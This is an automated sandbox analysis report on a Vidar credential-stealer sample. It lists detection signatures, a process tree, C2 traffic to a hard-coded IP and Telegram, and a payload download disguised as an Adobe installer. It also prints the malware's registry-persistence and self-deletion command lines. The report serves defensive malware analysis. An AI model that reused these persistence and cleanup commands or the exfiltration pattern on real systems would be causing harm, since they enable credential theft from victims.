Edit tour

Windows Analysis Report
MzRn1YNrbz

Overview

General Information

Sample Name:	MzRn1YNrbz (renamed file extension from none to exe)
Analysis ID:	627182
MD5:	ba041a9fc41225152308162ac9073707
SHA1:	2a4622d6e4974d71862b3976309d38d51603052b
SHA256:	0d5bfe99b0e343aa66584a28af6000c39f8b9aacc7f304d13b7e2a8cc31d16eb
Tags:	climatejustice-socialexe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: Add file from suspicious location to autostart registry

Yara detected Vidar stealer

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Uses cmd line tools excessively to alter registry or file data

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Allocates memory in foreign processes

May check the online IP address of the machine

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

PE file contains an invalid checksum

Drops PE files

Contains functionality to read the PEB

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

PE / OLE file has an invalid certificate

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

MzRn1YNrbz.exe (PID: 7016 cmdline: "C:\Users\user\Desktop\MzRn1YNrbz.exe" MD5: BA041A9FC41225152308162AC9073707)

conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

AppLaunch.exe (PID: 6252 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)

SRT2H1V9CYLP5LNSR3MB.exe (PID: 4416 cmdline: "C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe" MD5: 4A9ABB3B18F7EFB17C10DF19AE459B17)

conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

AppLaunch.exe (PID: 7108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)

reg.exe (PID: 3384 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe MD5: CEE2A7E57DF2A159A065A34913A055C2)

conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 5596 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000 MD5: CEE2A7E57DF2A159A065A34913A055C2)

conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4168 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im AppLaunch.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" & del C:\ProgramData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 6532 cmdline: taskkill /im AppLaunch.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

timeout.exe (PID: 6780 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.513911613.00000000052E8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x406b4:$s1: JohnDoe 0x406ac:$s2: HAL9TH
00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x40980:$s1: "os_crypt":{"encrypted_key":" 0x41bdc:$s2: screenshot.jpg 0x4084c:$s3: Content-Disposition: form-data; name="
00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: MzRn1YNrbz.exe PID: 7016	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MzRn1YNrbz.exe PID: 7016	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: AppLaunch.exe PID: 6252	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AppLaunch.exe PID: 6252	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.MzRn1YNrbz.exe.e629ac.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MzRn1YNrbz.exe.e629ac.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.MzRn1YNrbz.exe.e629ac.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x3e6b4:$s1: JohnDoe 0x3e6ac:$s2: HAL9TH
0.2.MzRn1YNrbz.exe.e629ac.0.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x3e980:$s1: "os_crypt":{"encrypted_key":" 0x3fbdc:$s2: screenshot.jpg 0x3e84c:$s3: Content-Disposition: form-data; name="
2.2.AppLaunch.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.AppLaunch.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.AppLaunch.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x3f6b4:$s1: JohnDoe 0x3f6ac:$s2: HAL9TH
2.2.AppLaunch.exe.400000.0.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x3f980:$s1: "os_crypt":{"encrypted_key":" 0x40bdc:$s2: screenshot.jpg 0x3f84c:$s3: Content-Disposition: form-data; name="
0.2.MzRn1YNrbz.exe.e629ac.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MzRn1YNrbz.exe.e629ac.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.MzRn1YNrbz.exe.e629ac.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x3f6b4:$s1: JohnDoe 0x3f6ac:$s2: HAL9TH
0.2.MzRn1YNrbz.exe.e629ac.0.raw.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x3f980:$s1: "os_crypt":{"encrypted_key":" 0x40bdc:$s2: screenshot.jpg 0x3f84c:$s3: Content-Disposition: form-data; name="
0.3.MzRn1YNrbz.exe.3070000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.MzRn1YNrbz.exe.3070000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.MzRn1YNrbz.exe.3070000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x3f6b4:$s1: JohnDoe 0x3f6ac:$s2: HAL9TH
0.3.MzRn1YNrbz.exe.3070000.0.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x3f980:$s1: "os_crypt":{"encrypted_key":" 0x40bdc:$s2: screenshot.jpg 0x3f84c:$s3: Content-Disposition: form-data; name="
0.3.MzRn1YNrbz.exe.3070000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.MzRn1YNrbz.exe.3070000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.MzRn1YNrbz.exe.3070000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x406b4:$s1: JohnDoe 0x406ac:$s2: HAL9TH
0.3.MzRn1YNrbz.exe.3070000.0.raw.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x40980:$s1: "os_crypt":{"encrypted_key":" 0x41bdc:$s2: screenshot.jpg 0x4084c:$s3: Content-Disposition: form-data; name="
Click to see the 15 entries

Sigma Signatures

Persistence and Installation Behavior

Sigma detected: Add file from suspicious location to autostart registry

Source: Process started

Author: Joe Security: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe, CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, ParentProcessId: 7108, ParentProcessName: AppLaunch.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe, ProcessId: 3384, ProcessName: reg.exe

Snort Signatures

ET TROJAN Vidar/Arkei/Megumin Stealer Keywords Retrieved - Source IP: 116.202.0.187 - Destination IP: 192.168.2.5

Timestamp:	116.202.0.187192.168.2.580497562035911 05/16/22-10:29:37.838204
SID:	2035911
Source Port:	80
Destination Port:	49756
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: MzRn1YNrbz.exe	Metadefender: Detection: 28%			Perma Link
Source: MzRn1YNrbz.exe	ReversingLabs: Detection: 60%

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe

Avira: detection malicious, Label: TR/Redcap.sblry

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe	ReversingLabs: Detection: 61%

Machine Learning detection for dropped file

Source: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Software[2].exe	Joe Sandbox ML: detected

Source: 7.3.SRT2H1V9CYLP5LNSR3MB.exe.2860000.0.unpack	Avira: Label: TR/ATRAPS.Gen4
Source: 0.2.MzRn1YNrbz.exe.e629ac.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: MzRn1YNrbz.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49786 version: TLS 1.2

Source: MzRn1YNrbz.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.2.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue.dll.2.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F1F23E FindFirstFileExW,	0_2_00F1F23E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00407000 FindFirstFileA,	14_2_00407000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00436483 FindFirstFileExW,	14_2_00436483

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2035911 ET TROJAN Vidar/Arkei/Megumin Stealer Keywords Retrieved 116.202.0.187:80 -> 192.168.2.5:49756

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

May check the online IP address of the machine

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	DNS query: name: ipinfo.io
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /verstappenf1r HTTP/1.1Host: t.me
Source: global traffic	HTTP traffic detected: GET /AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe HTTP/1.1Cache-Control: no-cacheHost: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/479754935/9956e2fd-f4a0-464d-bde7-7689139d2f54?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220516%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220516T082952Z&X-Amz-Expires=300&X-Amz-Signature=4c7240ec515c7cb063a6716cd0ef70b36234d6f863c926f5119f7f1a2916e474&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=479754935&response-content-disposition=attachment%3B%20filename%3DSoftware.exe&response-content-type=application%2Foctet-stream HTTP/1.1Cache-Control: no-cacheConnection: Keep-AliveHost: objects.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 116.202.0.187
Source: global traffic	HTTP traffic detected: GET /1199 HTTP/1.1Host: 116.202.0.187Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /update.zip HTTP/1.1Host: 116.202.0.187Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4CPROSXMVQCDF92UHost: 116.202.0.187Content-Length: 126869Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe HTTP/1.1Host: github.comCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 16 May 2022 08:30:13 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 16 May 2022 08:29:37 GMTContent-Type: application/zipContent-Length: 1565849Last-Modified: Wed, 13 Apr 2022 20:23:38 GMTConnection: keep-aliveETag: "6257314a-17e499"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 10 6e 55 53 4b 12 b5 9b e9 b5 00 00 48 47 01 00 10 00 00 00 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c ec fd 0b 40 54 d5 d7 30 0e 9f 61 06 18 71 60 46 05 45 45 1d 15 6f e1 65 98 e1 3e c3 55 06 f1 82 0e 22 e0 0d 11 b9 38 10 02 c1 39 a8 29 8a 0e 94 e3 69 ca 5f 59 59 59 69 5a 3f 2b 2b bb 99 99 19 88 09 98 29 5e 2a 4b 2b 34 ab 83 43 8a 46 80 4a ce b7 d6 3e 67 60 50 e9 79 9e f7 ff 3e ff f7 7b bf ef 41 f7 39 fb ba f6 da 6b af b5 f6 da fb ec bd 27 61 e1 16 4a 4c 51 94 04 9c cd 46 51 07 28 fe 2f 8a fa 8f ff 5a c0 79 8c 38 e8 41 7d d4 e7 eb 91 07 44 b3 be 1e 39 cf 98 5b a2 2c 2a 2e 5c 5e 9c b1 42 99 99 51 50 50 48 2b 97 65 2b 8b 99 02 65 6e 81 32 76 4e 92 72 45 61 56 f6 64 77 77 37 5f 01 86 e8 d6 ae d9 fa 6d 5f 0f b3 bb 1b 92 51 c3 a6 c1 7b 56 e3 92 61 b3 49 dc 89 61 f9 f0 de 7e bb de 27 99 bc 4f fa a4 90 77 9d 4f 34 79 7f e9 93 4e de 5f fb c4 92 b7 7a 18 ff 3e 45 c2 73 73 33 8d 08 d7 8e b3 41 4f 51 b3 44 ce 94 2c 64 dc 02 7b 5c 23 35 6a 64 5f 91 47 5f ea 2a 04 94 42 e4 bb e0 14 04 43 8a f8 d0 ef 44 51 2e f0 72 a3 f8 37 f9 8b 12 11 e2 1d ea e7 04 74 8c 8a 26 85 14 14 d5 fd e6 5f fb 80 58 9e 7d 28 aa 4a 21 a2 9e c0 48 a5 88 92 4a 1c 88 29 15 51 f1 91 f0 56 89 a8 ad 50 c1 be 11 14 15 42 f5 fe c7 8d b8 a7 8f 00 ee a1 7f c8 3f 99 ce 5e 45 c3 fb 68 93 80 d0 55 a1 d3 1d fe a0 e9 4b 27 67 65 d0 19 e0 8f 25 0d 14 91 36 53 d7 1c 73 91 7a ab 26 e7 f2 19 0f 38 f3 75 13 82 b4 dc 97 2f 6a 72 71 49 71 26 36 4f 82 15 08 f9 da 1e 94 2f 3b bf 30 93 22 6d 47 1a 50 32 78 77 de 97 2f 86 fa 9f bf ff ad 7f 45 63 e1 d1 00 0f 51 0b fa b6 8c 43 3a 8f c7 b8 87 30 d9 0f 45 06 1f 5b f0 b1 03 1f fb f0 51 85 8f 06 7c 28 27 62 87 e1 23 0a 1f 8d f8 50 4c c2 54 7c 50 93 31 88 8f a5 f8 68 51 63 89 00 8a e2 99 5b 15 8a f0 c2 30 a8 43 1f 3e a8 70 2c 11 81 25 f0 51 85 8f 46 7c 50 28 1d e5 f8 58 8a 8c 5f 14 8b 09 f8 a0 f4 58 39 3e 8a 88 2f 0e 71 c6 c7 52 7c 6c c1 07 35 0d eb c5 47 14 3e 96 e2 43 35 1d e1 cd 44 4c f1 d1 82 0f 6a 16 e6 c3 47 14 3e ca 49 30 01 d1 c0 47 d1 9b 18 87 8f 2d f8 d8 87 8f 2a e2 7b 0b f3 bd 8d 40 f1 11 85 8f a5 f8 28 22 c1 bd 58 02 1f 0d 7b ed 9a 65 3c 3c 44 1d f8 90 ec 83 87 6a 1f 82 c2 87 f4 7d 2c fb 01 12 1b 1f ca 0f 11 28 3e 12 f1 f1 1c 3e a8 8f a1 44 d1 7e 24 d3 67 48 83 06 04 7f 1a 83 df a1 ef 22 36 e6 47 2c fb 33 82 6a 44 0c 7e 45 5c f0 b1 f4 37 28 bb 03 1f 0d bf 61 02 87 a0 50 15 18 ac 58 a5 b5 07 6f d8 b5 5f b9 92 52 40 26 85 ca 49 a4 28 07 47 f1 9d ad d8 e3 49 29 ae 80 53 7a 51 0a c5 50 4a e1 0b 2e 0a dc 3c 70 34 b8 bd 10 7f 00 5c 15 b8 13 e0 ce 83 bb 02 ae 05 1c 35 90 52 c8 c0 79 82 f3 01 37 1e 5c 00 b8 88 81 bc d6 8c 82 77 3c 38 03 b8 79 e0 e6 83 5b 0c 6e 29 b8 2c 70 46 70 f9 e0 56 81 5b 0b ae 1c 5c 05 b8 4d e0 9e 00 b7 05 dc 56 70 db c0 6d 07 b7 03 dc 6e 70 7b c0 ed 05 b7 0f

Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187
Source: unknown	TCP traffic detected without corresponding DNS query: 116.202.0.187

Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://116.202.0.187/
Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://116.202.0.187/1199
